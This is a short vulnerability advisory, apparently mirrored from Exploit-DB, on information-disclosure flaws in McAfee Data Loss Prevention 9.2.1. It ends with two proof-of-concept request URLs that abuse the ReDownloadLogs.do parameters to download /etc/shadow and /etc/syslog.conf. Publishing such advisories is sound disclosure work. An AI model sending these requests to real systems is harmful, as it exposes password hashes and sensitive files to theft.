McAfee Data Loss Prevention – Multiple Information Disclosure Vulnerabilities

  • 作者: Jamie Ooi
    日期: 2013-06-24
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38631/
  • source: https://www.securityfocus.com/bid/61033/info
    
    McAfee Data Loss Prevention is prone to multiple information-disclosure vulnerabilities.
    
    Attackers can exploit these issues to disclose contents of arbitrary files and obtain sensitive information. This may aid in launching further attacks.
    
    McAfee Data Loss Prevention 9.2.1 is vulnerable; prior versions may also be affected. 
    
    https://www.example.com/ReDownloadLogs.do?filepath=/etc&filename=shadow&cmdName=false
    
    https://www.example.com/ReDownloadLogs.do?filepath=/etc&filename=syslog.conf&cmdName=false